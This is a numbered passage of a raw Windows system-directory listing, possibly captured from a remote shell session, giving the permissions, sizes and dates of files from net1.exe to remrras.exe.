  1579. 100777/rwxrwxrwx 124176 fil 2002-12-31 07:00:00 -0500 net1.exe
  1580. 100666/rw-rw-rw- 108464 fil 2002-12-31 07:00:00 -0500 netapi.dll
  1581. 100666/rw-rw-rw- 311568 fil 2002-12-31 07:00:00 -0500 netapi32.dll
  1582. 100666/rw-rw-rw- 547600 fil 2002-12-31 07:00:00 -0500 netcfgx.dll
  1583. 100777/rwxrwxrwx 108816 fil 2002-12-31 07:00:00 -0500 netdde.exe
  1584. 100666/rw-rw-rw- 21264 fil 2002-12-31 07:00:00 -0500 netdet.dll
  1585. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 netdtect.dll
  1586. 100666/rw-rw-rw- 195584 fil 2002-12-31 07:00:00 -0500 netevent.dll
  1587. 100666/rw-rw-rw- 255760 fil 2002-12-31 07:00:00 -0500 neth.dll
  1588. 100666/rw-rw-rw- 131344 fil 2002-12-31 07:00:00 -0500 netid.dll
  1589. 100666/rw-rw-rw- 371984 fil 2002-12-31 07:00:00 -0500 netlogon.dll
  1590. 100666/rw-rw-rw- 95504 fil 2002-12-31 07:00:00 -0500 netman.dll
  1591. 40777/rwxrwxrwx 0 dir 2017-05-25 06:18:02 -0400 netmon
  1592. 100666/rw-rw-rw- 156160 fil 2002-12-31 07:00:00 -0500 netmsg.dll
  1593. 100666/rw-rw-rw- 173840 fil 2002-12-31 07:00:00 -0500 netplwiz.dll
  1594. 100666/rw-rw-rw- 11536 fil 2002-12-31 07:00:00 -0500 netrap.dll
  1595. 100777/rwxrwxrwx 84240 fil 2002-12-31 07:00:00 -0500 netsh.exe
  1596. 100666/rw-rw-rw- 477456 fil 2002-12-31 07:00:00 -0500 netshell.dll
  1597. 100777/rwxrwxrwx 26896 fil 2002-12-31 07:00:00 -0500 netstat.exe
  1598. 100666/rw-rw-rw- 71952 fil 2002-12-31 07:00:00 -0500 netui0.dll
  1599. 100666/rw-rw-rw- 215312 fil 2002-12-31 07:00:00 -0500 netui1.dll
  1600. 100666/rw-rw-rw- 286992 fil 2002-12-31 07:00:00 -0500 netui2.dll
  1601. 100666/rw-rw-rw- 2656 fil 2002-12-31 07:00:00 -0500 netware.drv
  1602. 100666/rw-rw-rw- 113936 fil 2002-12-31 07:00:00 -0500 newdev.dll
  1603. 100666/rw-rw-rw- 89600 fil 2002-12-31 07:00:00 -0500 nlhtml.dll
  1604. 100777/rwxrwxrwx 7052 fil 2002-12-31 07:00:00 -0500 nlsfunc.exe
  1605. 100666/rw-rw-rw- 3072 fil 2002-12-31 07:00:00 -0500 nmevtmsg.dll
  1606. 100666/rw-rw-rw- 12560 fil 2002-12-31 07:00:00 -0500 nmmkcert.dll
  1607. 100666/rw-rw-rw- 13584 fil 2003-06-19 22:45:08 -0400 nntpapi.dll
  1608. 100666/rw-rw-rw- 14096 fil 2003-06-19 22:45:08 -0400 nntpctrs.dll
  1609. 100666/rw-rw-rw- 5523 fil 1998-09-16 21:08:28 -0400 nntpctrs.h
  1610. 100666/rw-rw-rw- 17579 fil 1999-01-26 01:19:02 -0500 nntpctrs.ini
  1611. 100666/rw-rw-rw- 741 fil 2002-12-31 07:00:00 -0500 noise.dat
  1612. 100666/rw-rw-rw- 149848 fil 2002-12-31 07:00:00 -0500 noise.deu
  1613. 100666/rw-rw-rw- 751 fil 2002-12-31 07:00:00 -0500 noise.eng
  1614. 100666/rw-rw-rw- 751 fil 2002-12-31 07:00:00 -0500 noise.enu
  1615. 100666/rw-rw-rw- 19684 fil 2002-12-31 07:00:00 -0500 noise.esn
  1616. 100666/rw-rw-rw- 49196 fil 2002-12-31 07:00:00 -0500 noise.fra
  1617. 100666/rw-rw-rw- 19618 fil 2002-12-31 07:00:00 -0500 noise.ita
  1618. 100666/rw-rw-rw- 13256 fil 2002-12-31 07:00:00 -0500 noise.nld
  1619. 100666/rw-rw-rw- 13730 fil 2002-12-31 07:00:00 -0500 noise.sve
  1620. 100777/rwxrwxrwx 50960 fil 2002-12-31 07:00:00 -0500 notepad.exe
  1621. 40777/rwxrwxrwx 0 dir 2017-05-24 22:48:46 -0400 npp
  1622. 100666/rw-rw-rw- 51984 fil 2002-12-31 07:00:00 -0500 npptools.dll
  1623. 100666/rw-rw-rw- 23392 fil 2017-05-25 06:15:23 -0400 nscompat.tlb
  1624. 100777/rwxrwxrwx 88336 fil 2002-12-31 07:00:00 -0500 nslookup.exe
  1625. 100666/rw-rw-rw- 8035 fil 2002-12-31 07:00:00 -0500 nt.fnt
  1626. 100666/rw-rw-rw- 11319 fil 2002-12-31 07:00:00 -0500 nt2.fnt
  1627. 100777/rwxrwxrwx 1164048 fil 2002-12-31 07:00:00 -0500 ntbackup.exe
  1628. 100777/rwxrwxrwx 33552 fil 2002-12-31 07:00:00 -0500 ntbooks.exe
  1629. 100666/rw-rw-rw- 491792 fil 2002-12-31 07:00:00 -0500 ntdll.dll
  1630. 100666/rw-rw-rw- 27866 fil 2002-12-31 07:00:00 -0500 ntdos.sys
  1631. 100666/rw-rw-rw- 29146 fil 2002-12-31 07:00:00 -0500 ntdos404.sys
  1632. 100666/rw-rw-rw- 29370 fil 2002-12-31 07:00:00 -0500 ntdos411.sys
  1633. 100666/rw-rw-rw- 29274 fil 2002-12-31 07:00:00 -0500 ntdos412.sys
  1634. 100666/rw-rw-rw- 29146 fil 2002-12-31 07:00:00 -0500 ntdos804.sys
  1635. 100666/rw-rw-rw- 6307840 fil 2002-12-31 07:00:00 -0500 ntds.dit
  1636. 100666/rw-rw-rw- 1040656 fil 2002-12-31 07:00:00 -0500 ntdsa.dll
  1637. 100666/rw-rw-rw- 57616 fil 2002-12-31 07:00:00 -0500 ntdsapi.dll
  1638. 100666/rw-rw-rw- 32016 fil 2002-12-31 07:00:00 -0500 ntdsatq.dll
  1639. 100666/rw-rw-rw- 28432 fil 2002-12-31 07:00:00 -0500 ntdsbcli.dll
  1640. 100666/rw-rw-rw- 20992 fil 2002-12-31 07:00:00 -0500 ntdsbmsg.dll
  1641. 100666/rw-rw-rw- 29968 fil 2002-12-31 07:00:00 -0500 ntdsbsrv.dll
  1642. 100666/rw-rw-rw- 13833 fil 2002-12-31 07:00:00 -0500 ntdsctr.h
  1643. 100666/rw-rw-rw- 22582 fil 2002-12-31 07:00:00 -0500 ntdsctrs.ini
  1644. 100666/rw-rw-rw- 67344 fil 2002-12-31 07:00:00 -0500 ntdsetup.dll
  1645. 100666/rw-rw-rw- 79632 fil 2002-12-31 07:00:00 -0500 ntdskcc.dll
  1646. 100666/rw-rw-rw- 217088 fil 2002-12-31 07:00:00 -0500 ntdsmsg.dll
  1647. 100666/rw-rw-rw- 11536 fil 2002-12-31 07:00:00 -0500 ntdsperf.dll
  1648. 100777/rwxrwxrwx 165136 fil 2002-12-31 07:00:00 -0500 ntdsutil.exe
  1649. 100666/rw-rw-rw- 56592 fil 2002-12-31 07:00:00 -0500 ntdsxds.dll
  1650. 100777/rwxrwxrwx 745232 fil 2002-12-31 07:00:00 -0500 ntfrs.exe
  1651. 100666/rw-rw-rw- 56080 fil 2002-12-31 07:00:00 -0500 ntfrsapi.dll
  1652. 100666/rw-rw-rw- 1975 fil 2002-12-31 07:00:00 -0500 ntfrscon.h
  1653. 100666/rw-rw-rw- 5597 fil 2002-12-31 07:00:00 -0500 ntfrscon.ini
  1654. 100666/rw-rw-rw- 22288 fil 2002-12-31 07:00:00 -0500 ntfrsprf.dll
  1655. 100666/rw-rw-rw- 6738 fil 2002-12-31 07:00:00 -0500 ntfrsrep.h
  1656. 100666/rw-rw-rw- 20386 fil 2002-12-31 07:00:00 -0500 ntfrsrep.ini
  1657. 100666/rw-rw-rw- 80384 fil 2002-12-31 07:00:00 -0500 ntfrsres.dll
  1658. 100777/rwxrwxrwx 46352 fil 2002-12-31 07:00:00 -0500 ntfrsupg.exe
  1659. 100666/rw-rw-rw- 773 fil 1999-02-26 20:30:04 -0500 ntfsdrct.h
  1660. 100666/rw-rw-rw- 1037 fil 1999-02-26 20:30:04 -0500 ntfsdrct.ini
  1661. 100666/rw-rw-rw- 48794 fil 2002-12-31 07:00:00 -0500 ntimage.gif
  1662. 100666/rw-rw-rw- 33824 fil 2002-12-31 07:00:00 -0500 ntio.sys
  1663. 100666/rw-rw-rw- 34544 fil 2002-12-31 07:00:00 -0500 ntio404.sys
  1664. 100666/rw-rw-rw- 35648 fil 2002-12-31 07:00:00 -0500 ntio411.sys
  1665. 100666/rw-rw-rw- 35408 fil 2002-12-31 07:00:00 -0500 ntio412.sys
  1666. 100666/rw-rw-rw- 34544 fil 2002-12-31 07:00:00 -0500 ntio804.sys
  1667. 100777/rwxrwxrwx 1694080 fil 2002-12-31 07:00:00 -0500 ntkrnlpa.exe
  1668. 100666/rw-rw-rw- 36112 fil 2002-12-31 07:00:00 -0500 ntlanman.dll
  1669. 100666/rw-rw-rw- 60688 fil 2002-12-31 07:00:00 -0500 ntlanui.dll
  1670. 100666/rw-rw-rw- 15632 fil 2002-12-31 07:00:00 -0500 ntlanui2.dll
  1671. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 ntlsapi.dll
  1672. 100666/rw-rw-rw- 102672 fil 2002-12-31 07:00:00 -0500 ntmarta.dll
  1673. 100666/rw-rw-rw- 53520 fil 2002-12-31 07:00:00 -0500 ntmsapi.dll
  1674. 100666/rw-rw-rw- 173328 fil 2002-12-31 07:00:00 -0500 ntmsdba.dll
  1675. 100666/rw-rw-rw- 39184 fil 2002-12-31 07:00:00 -0500 ntmsevt.dll
  1676. 100666/rw-rw-rw- 438032 fil 2002-12-31 07:00:00 -0500 ntmsmgr.dll
  1677. 100666/rw-rw-rw- 51200 fil 2002-12-31 07:00:00 -0500 ntmsmgr.msc
  1678. 100666/rw-rw-rw- 23040 fil 2002-12-31 07:00:00 -0500 ntmsoprq.msc
  1679. 100666/rw-rw-rw- 401168 fil 2002-12-31 07:00:00 -0500 ntmssvc.dll
  1680. 100777/rwxrwxrwx 1719056 fil 2002-12-31 07:00:00 -0500 ntoskrnl.exe
  1681. 100666/rw-rw-rw- 66320 fil 2002-12-31 07:00:00 -0500 ntprint.dll
  1682. 100777/rwxrwxrwx 163600 fil 2002-12-31 07:00:00 -0500 ntsd.exe
  1683. 100666/rw-rw-rw- 85776 fil 2002-12-31 07:00:00 -0500 ntsdexts.dll
  1684. 100666/rw-rw-rw- 47888 fil 2002-12-31 07:00:00 -0500 ntshrui.dll
  1685. 100777/rwxrwxrwx 396560 fil 2002-12-31 07:00:00 -0500 ntvdm.exe
  1686. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 ntvdmd.dll
  1687. 100777/rwxrwxrwx 3252 fil 2002-12-31 07:00:00 -0500 nw16.exe
  1688. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 nwapi16.dll
  1689. 100666/rw-rw-rw- 64784 fil 2002-12-31 07:00:00 -0500 nwapi32.dll
  1690. 100666/rw-rw-rw- 41232 fil 2002-12-31 07:00:00 -0500 nwc.cpl
  1691. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 nwcfg.dll
  1692. 100666/rw-rw-rw- 7952 fil 2002-12-31 07:00:00 -0500 nwevent.dll
  1693. 100666/rw-rw-rw- 139536 fil 2002-12-31 07:00:00 -0500 nwprovau.dll
  1694. 100777/rwxrwxrwx 143632 fil 2002-12-31 07:00:00 -0500 nwscript.exe
  1695. 100666/rw-rw-rw- 60688 fil 2002-12-31 07:00:00 -0500 nwwks.dll
  1696. 100666/rw-rw-rw- 446224 fil 2002-12-31 07:00:00 -0500 oakley.dll
  1697. 100666/rw-rw-rw- 214800 fil 2002-12-31 07:00:00 -0500 objsel.dll
  1698. 100666/rw-rw-rw- 87824 fil 2002-12-31 07:00:00 -0500 occache.dll
  1699. 100666/rw-rw-rw- 57104 fil 2002-12-31 07:00:00 -0500 ocmanage.dll
  1700. 100666/rw-rw-rw- 26224 fil 2002-12-31 07:00:00 -0500 odbc16gt.dll
  1701. 100666/rw-rw-rw- 217360 fil 2002-12-31 07:00:00 -0500 odbc32.dll
  1702. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 odbc32gt.dll
  1703. 100777/rwxrwxrwx 37136 fil 2002-12-31 07:00:00 -0500 odbcad32.exe
  1704. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 odbcbcp.dll
  1705. 100666/rw-rw-rw- 41232 fil 2002-12-31 07:00:00 -0500 odbcconf.dll
  1706. 100777/rwxrwxrwx 41232 fil 2002-12-31 07:00:00 -0500 odbcconf.exe
  1707. 100666/rw-rw-rw- 4296 fil 2002-12-31 07:00:00 -0500 odbcconf.rsp
  1708. 100666/rw-rw-rw- 41232 fil 2002-12-31 07:00:00 -0500 odbccp32.cpl
  1709. 100666/rw-rw-rw- 102672 fil 2002-12-31 07:00:00 -0500 odbccp32.dll
  1710. 100666/rw-rw-rw- 196880 fil 2002-12-31 07:00:00 -0500 odbccr32.dll
  1711. 100666/rw-rw-rw- 200976 fil 2002-12-31 07:00:00 -0500 odbccu32.dll
  1712. 100666/rw-rw-rw- 90112 fil 2002-12-31 07:00:00 -0500 odbcint.dll
  1713. 100666/rw-rw-rw- 53520 fil 2002-12-31 07:00:00 -0500 odbcji32.dll
  1714. 100666/rw-rw-rw- 270608 fil 2002-12-31 07:00:00 -0500 odbcjt32.dll
  1715. 100666/rw-rw-rw- 155920 fil 2002-12-31 07:00:00 -0500 odbctrac.dll
  1716. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 oddbse32.dll
  1717. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 odexl32.dll
  1718. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 odfox32.dll
  1719. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 odpdx32.dll
  1720. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 odtext32.dll
  1721. 100666/rw-rw-rw- 110080 fil 2002-12-31 07:00:00 -0500 offfilt.dll
  1722. 100666/rw-rw-rw- 444176 fil 2002-12-31 07:00:00 -0500 oieng400.dll
  1723. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 oiprt400.dll
  1724. 100666/rw-rw-rw- 21776 fil 2002-12-31 07:00:00 -0500 oislb400.dll
  1725. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 oissq400.dll
  1726. 100666/rw-rw-rw- 25872 fil 2002-12-31 07:00:00 -0500 oitwa400.dll
  1727. 100666/rw-rw-rw- 61712 fil 2002-12-31 07:00:00 -0500 oiui400.dll
  1728. 100666/rw-rw-rw- 39728 fil 2002-12-31 07:00:00 -0500 ole2.dll
  1729. 100666/rw-rw-rw- 169520 fil 2002-12-31 07:00:00 -0500 ole2disp.dll
  1730. 100666/rw-rw-rw- 153008 fil 2002-12-31 07:00:00 -0500 ole2nls.dll
  1731. 100666/rw-rw-rw- 996112 fil 2002-12-31 07:00:00 -0500 ole32.dll
  1732. 100666/rw-rw-rw- 113936 fil 2002-12-31 07:00:00 -0500 oleacc.dll
  1733. 100666/rw-rw-rw- 11264 fil 2002-12-31 07:00:00 -0500 oleaccrc.dll
  1734. 100666/rw-rw-rw- 626960 fil 2002-12-31 07:00:00 -0500 oleaut32.dll
  1735. 100666/rw-rw-rw- 82944 fil 2002-12-31 07:00:00 -0500 olecli.dll
  1736. 100666/rw-rw-rw- 69392 fil 2002-12-31 07:00:00 -0500 olecli32.dll
  1737. 100666/rw-rw-rw- 35600 fil 2002-12-31 07:00:00 -0500 olecnv32.dll
  1738. 100666/rw-rw-rw- 118032 fil 2002-12-31 07:00:00 -0500 oledlg.dll
  1739. 100666/rw-rw-rw- 106256 fil 2002-12-31 07:00:00 -0500 oleprn.dll
  1740. 100666/rw-rw-rw- 164112 fil 2002-12-31 07:00:00 -0500 olepro32.dll
  1741. 100666/rw-rw-rw- 24064 fil 2002-12-31 07:00:00 -0500 olesvr.dll
  1742. 100666/rw-rw-rw- 22800 fil 2002-12-31 07:00:00 -0500 olesvr32.dll
  1743. 100666/rw-rw-rw- 70928 fil 2002-12-31 07:00:00 -0500 olethk32.dll
  1744. 100666/rw-rw-rw- 692496 fil 2002-12-31 07:00:00 -0500 opengl32.dll
  1745. 40777/rwxrwxrwx 0 dir 2017-05-24 22:49:06 -0400 os2
  1746. 100777/rwxrwxrwx 399120 fil 2002-12-31 07:00:00 -0500 os2.exe
  1747. 100777/rwxrwxrwx 121616 fil 2002-12-31 07:00:00 -0500 os2srv.exe
  1748. 100777/rwxrwxrwx 6416 fil 2002-12-31 07:00:00 -0500 os2ss.exe
  1749. 100777/rwxrwxrwx 221456 fil 2002-12-31 07:00:00 -0500 osk.exe
  1750. 100666/rw-rw-rw- 144144 fil 2002-12-31 07:00:00 -0500 ospf.dll
  1751. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 ospfagnt.dll
  1752. 100666/rw-rw-rw- 72976 fil 2002-12-31 07:00:00 -0500 ospfmib.dll
  1753. 100666/rw-rw-rw- 23345 fil 2002-12-31 07:00:00 -0500 other.inf
  1754. 100777/rwxrwxrwx 53008 fil 2002-12-31 07:00:00 -0500 packager.exe
  1755. 100666/rw-rw-rw- 11024 fil 2002-12-31 07:00:00 -0500 panmap.dll
  1756. 100777/rwxrwxrwx 18192 fil 2002-12-31 07:00:00 -0500 pathping.exe
  1757. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 pautoenr.dll
  1758. 100777/rwxrwxrwx 44816 fil 2002-12-31 07:00:00 -0500 pax.exe
  1759. 100666/rw-rw-rw- 114 fil 2002-12-31 07:00:00 -0500 pcl.sep
  1760. 100666/rw-rw-rw- 151824 fil 2002-12-31 07:00:00 -0500 pdh.dll
  1761. 100666/rw-rw-rw- 183574 fil 1999-02-28 04:32:16 -0500 pdm.dll
  1762. 100777/rwxrwxrwx 16144 fil 2002-12-31 07:00:00 -0500 pentnt.exe
  1763. 100666/rw-rw-rw- 67456 fil 2017-05-25 06:14:58 -0400 perfc009.dat
  1764. 100666/rw-rw-rw- 427 fil 2002-12-31 07:00:00 -0500 perfci.h
  1765. 100666/rw-rw-rw- 2891 fil 2002-12-31 07:00:00 -0500 perfci.ini
  1766. 100666/rw-rw-rw- 42256 fil 2002-12-31 07:00:00 -0500 perfctrs.dll
  1767. 100666/rw-rw-rw- 28270 fil 2002-12-31 07:00:00 -0500 perfd009.dat
  1768. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 perfdisk.dll
  1769. 100666/rw-rw-rw- 140 fil 2002-12-31 07:00:00 -0500 perffilt.h
  1770. 100666/rw-rw-rw- 1152 fil 2002-12-31 07:00:00 -0500 perffilt.ini
  1771. 100666/rw-rw-rw- 402080 fil 2017-05-25 06:14:58 -0400 perfh009.dat
  1772. 100666/rw-rw-rw- 272492 fil 2002-12-31 07:00:00 -0500 perfi009.dat
  1773. 100777/rwxrwxrwx 15632 fil 2002-12-31 07:00:00 -0500 perfmon.exe
  1774. 100444/r--r--r-- 68608 fil 2002-12-31 07:00:00 -0500 perfmon.msc
  1775. 100666/rw-rw-rw- 17680 fil 2002-12-31 07:00:00 -0500 perfnet.dll
  1776. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 perfnw.dll
  1777. 100666/rw-rw-rw- 21776 fil 2002-12-31 07:00:00 -0500 perfos.dll
  1778. 100666/rw-rw-rw- 29456 fil 2002-12-31 07:00:00 -0500 perfproc.dll
  1779. 100666/rw-rw-rw- 12560 fil 2002-12-31 07:00:00 -0500 perfts.dll
  1780. 100666/rw-rw-rw- 435 fil 2002-12-31 07:00:00 -0500 perfwci.h
  1781. 100666/rw-rw-rw- 2732 fil 2002-12-31 07:00:00 -0500 perfwci.ini
  1782. 100666/rw-rw-rw- 69424 fil 2002-12-31 07:00:00 -0500 pidgen.dll
  1783. 100666/rw-rw-rw- 37136 fil 2002-12-31 07:00:00 -0500 pifmgr.dll
  1784. 100777/rwxrwxrwx 16144 fil 2002-12-31 07:00:00 -0500 ping.exe
  1785. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 pjlmon.dll
  1786. 100666/rw-rw-rw- 71952 fil 2002-12-31 07:00:00 -0500 plugin.ocx
  1787. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 plustab.dll
  1788. 100666/rw-rw-rw- 46592 fil 2002-12-31 07:00:00 -0500 pmspl.dll
  1789. 100666/rw-rw-rw- 48912 fil 2002-12-31 07:00:00 -0500 pngfilt.dll
  1790. 100666/rw-rw-rw- 111888 fil 2002-12-31 07:00:00 -0500 polagent.dll
  1791. 100666/rw-rw-rw- 146192 fil 2002-12-31 07:00:00 -0500 polstore.dll
  1792. 100777/rwxrwxrwx 70928 fil 2002-12-31 07:00:00 -0500 posix.exe
  1793. 100666/rw-rw-rw- 90896 fil 2002-12-31 07:00:00 -0500 powercfg.cpl
  1794. 100666/rw-rw-rw- 13584 fil 2002-12-31 07:00:00 -0500 powrprof.dll
  1795. 100666/rw-rw-rw- 17680 fil 2002-12-31 07:00:00 -0500 prflbmsg.dll
  1796. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 print.exe
  1797. 100666/rw-rw-rw- 10583 fil 2002-12-31 07:00:00 -0500 printmon.inf
  1798. 100666/rw-rw-rw- 381712 fil 2002-12-31 07:00:00 -0500 printui.dll
  1799. 100666/rw-rw-rw- 69392 fil 2002-12-31 07:00:00 -0500 proctexe.ocx
  1800. 100666/rw-rw-rw- 276 fil 2002-12-31 07:00:00 -0500 prodspec.ini
  1801. 100666/rw-rw-rw- 29968 fil 2002-12-31 07:00:00 -0500 profmap.dll
  1802. 100777/rwxrwxrwx 162064 fil 2002-12-31 07:00:00 -0500 progman.exe
  1803. 100777/rwxrwxrwx 47888 fil 2002-12-31 07:00:00 -0500 proquota.exe
  1804. 100666/rw-rw-rw- 28944 fil 2002-12-31 07:00:00 -0500 psapi.dll
  1805. 100666/rw-rw-rw- 115472 fil 2002-12-31 07:00:00 -0500 psbase.dll
  1806. 100666/rw-rw-rw- 3010 fil 2002-12-31 07:00:00 -0500 pschdcnt.h
  1807. 100666/rw-rw-rw- 10512 fil 2002-12-31 07:00:00 -0500 pschdprf.dll
  1808. 100666/rw-rw-rw- 6826 fil 2002-12-31 07:00:00 -0500 pschdprf.ini
  1809. 100666/rw-rw-rw- 51 fil 2002-12-31 07:00:00 -0500 pscript.sep
  1810. 100666/rw-rw-rw- 7952 fil 2002-12-31 07:00:00 -0500 psnppagn.dll
  1811. 100666/rw-rw-rw- 37648 fil 2002-12-31 07:00:00 -0500 pstorec.dll
  1812. 100666/rw-rw-rw- 32016 fil 2002-12-31 07:00:00 -0500 psxdll.dll
  1813. 100777/rwxrwxrwx 89872 fil 2002-12-31 07:00:00 -0500 psxss.exe
  1814. 100666/rw-rw-rw- 3708 fil 2002-12-31 07:00:00 -0500 pubprn.vbs
  1815. 100666/rw-rw-rw- 8976 fil 2002-12-31 07:00:00 -0500 pwdssp.dll
  1816. 100777/rwxrwxrwx 18192 fil 2002-12-31 07:00:00 -0500 qappsrv.exe
  1817. 100666/rw-rw-rw- 166672 fil 2002-12-31 07:00:00 -0500 qcap.dll
  1818. 100666/rw-rw-rw- 176400 fil 2002-12-31 07:00:00 -0500 qcut.dll
  1819. 100666/rw-rw-rw- 214288 fil 2002-12-31 07:00:00 -0500 qdv.dll
  1820. 100666/rw-rw-rw- 271632 fil 2002-12-31 07:00:00 -0500 qdvd.dll
  1821. 100666/rw-rw-rw- 244224 fil 2002-12-31 07:00:00 -0500 qmgr.dll
  1822. 100666/rw-rw-rw- 18432 fil 2002-12-31 07:00:00 -0500 qmgrprxy.dll
  1823. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 qosname.dll
  1824. 100777/rwxrwxrwx 19728 fil 2002-12-31 07:00:00 -0500 qprocess.exe
  1825. 100666/rw-rw-rw- 828688 fil 2002-12-31 07:00:00 -0500 quartz.dll
  1826. 100666/rw-rw-rw- 1427216 fil 2002-12-31 07:00:00 -0500 query.dll
  1827. 100777/rwxrwxrwx 10512 fil 2002-12-31 07:00:00 -0500 query.exe
  1828. 100777/rwxrwxrwx 17680 fil 2002-12-31 07:00:00 -0500 quser.exe
  1829. 100777/rwxrwxrwx 23312 fil 2002-12-31 07:00:00 -0500 qwinsta.exe
  1830. 100666/rw-rw-rw- 25360 fil 2002-12-31 07:00:00 -0500 rapilib.dll
  1831. 40777/rwxrwxrwx 0 dir 2017-05-24 22:48:55 -0400 ras
  1832. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 rasadhlp.dll
  1833. 100777/rwxrwxrwx 118032 fil 2002-12-31 07:00:00 -0500 rasadmin.exe
  1834. 100666/rw-rw-rw- 197392 fil 2002-12-31 07:00:00 -0500 rasapi32.dll
  1835. 100666/rw-rw-rw- 9488 fil 2002-12-31 07:00:00 -0500 rasauth.dll
  1836. 100666/rw-rw-rw- 77584 fil 2002-12-31 07:00:00 -0500 rasauto.dll
  1837. 100777/rwxrwxrwx 8976 fil 2002-12-31 07:00:00 -0500 rasautou.exe
  1838. 100666/rw-rw-rw- 60688 fil 2002-12-31 07:00:00 -0500 raschap.dll
  1839. 100666/rw-rw-rw- 1818 fil 2002-12-31 07:00:00 -0500 rasctrnm.h
  1840. 100666/rw-rw-rw- 12560 fil 2002-12-31 07:00:00 -0500 rasctrs.dll
  1841. 100666/rw-rw-rw- 3458 fil 2002-12-31 07:00:00 -0500 rasctrs.ini
  1842. 100777/rwxrwxrwx 12560 fil 2002-12-31 07:00:00 -0500 rasdial.exe
  1843. 100666/rw-rw-rw- 529168 fil 2002-12-31 07:00:00 -0500 rasdlg.dll
  1844. 100666/rw-rw-rw- 263952 fil 2002-12-31 07:00:00 -0500 rasdlg4.dll
  1845. 100666/rw-rw-rw- 11536 fil 2002-12-31 07:00:00 -0500 rasgprxy.dll
  1846. 100666/rw-rw-rw- 48400 fil 2002-12-31 07:00:00 -0500 rasgtwy.dll
  1847. 100666/rw-rw-rw- 56080 fil 2002-12-31 07:00:00 -0500 rasman.dll
  1848. 100666/rw-rw-rw- 153360 fil 2002-12-31 07:00:00 -0500 rasmans.dll
  1849. 100666/rw-rw-rw- 154896 fil 2002-12-31 07:00:00 -0500 rasmontr.dll
  1850. 100666/rw-rw-rw- 23312 fil 2002-12-31 07:00:00 -0500 rasmxs.dll
  1851. 100777/rwxrwxrwx 32016 fil 2002-12-31 07:00:00 -0500 rasphone.exe
  1852. 100666/rw-rw-rw- 198928 fil 2002-12-31 07:00:00 -0500 rasppp.dll
  1853. 100666/rw-rw-rw- 23824 fil 2002-12-31 07:00:00 -0500 rasrad.dll
  1854. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 rassapi.dll
  1855. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 rassauth.dll
  1856. 100666/rw-rw-rw- 63248 fil 2002-12-31 07:00:00 -0500 rasscrpt.dll
  1857. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 rasser.dll
  1858. 100666/rw-rw-rw- 21776 fil 2002-12-31 07:00:00 -0500 rassfm.dll
  1859. 100666/rw-rw-rw- 54032 fil 2002-12-31 07:00:00 -0500 rastapi.dll
  1860. 100666/rw-rw-rw- 100624 fil 2002-12-31 07:00:00 -0500 rastls.dll
  1861. 100666/rw-rw-rw- 144656 fil 2002-12-31 07:00:00 -0500 rasuser.dll
  1862. 100666/rw-rw-rw- 143632 fil 2002-12-31 07:00:00 -0500 rcamsp.dll
  1863. 100777/rwxrwxrwx 20240 fil 2002-12-31 07:00:00 -0500 rcp.exe
  1864. 100666/rw-rw-rw- 5904 fil 2002-12-31 07:00:00 -0500 rdpcfgex.dll
  1865. 100777/rwxrwxrwx 40720 fil 2002-12-31 07:00:00 -0500 rdpclip.exe
  1866. 100666/rw-rw-rw- 49912 fil 2002-12-31 07:00:00 -0500 rdpdd.dll
  1867. 100666/rw-rw-rw- 100248 fil 2002-12-31 07:00:00 -0500 rdpwsx.dll
  1868. 100777/rwxrwxrwx 8464 fil 2002-12-31 07:00:00 -0500 recover.exe
  1869. 100777/rwxrwxrwx 3338 fil 2002-12-31 07:00:00 -0500 redir.exe
  1870. 100666/rw-rw-rw- 36112 fil 2002-12-31 07:00:00 -0500 regapi.dll
  1871. 100777/rwxrwxrwx 139536 fil 2002-12-31 07:00:00 -0500 regedt32.exe
  1872. 100777/rwxrwxrwx 35600 fil 2002-12-31 07:00:00 -0500 regini.exe
  1873. 100777/rwxrwxrwx 15120 fil 2002-12-31 07:00:00 -0500 register.exe
  1874. 100666/rw-rw-rw- 13403 fil 2002-12-31 07:00:00 -0500 registry.inf
  1875. 100777/rwxrwxrwx 68368 fil 2002-12-31 07:00:00 -0500 regsvc.exe
  1876. 100777/rwxrwxrwx 11024 fil 2002-12-31 07:00:00 -0500 regsvr32.exe
  1877. 100777/rwxrwxrwx 24336 fil 2003-06-19 22:45:28 -0400 regtrace.exe
  1878. 100777/rwxrwxrwx 5392 fil 2002-12-31 07:00:00 -0500 regwiz.exe
  1879. 100666/rw-rw-rw- 365328 fil 2002-12-31 07:00:00 -0500 regwizc.dll
  1880. 100666/rw-rw-rw- 27408 fil 2002-12-31 07:00:00 -0500 relay.dll
  1881. 40777/rwxrwxrwx 0 dir 2017-05-25 06:18:02 -0400 reminst
  1882. 100666/rw-rw-rw- 67856 fil 2002-12-31 07:00:00 -0500 remotesp.tsp
  1883. 100777/rwxrwxrwx 36112 fil 2002-12-31 07:00:00 -0500 remrras.exe
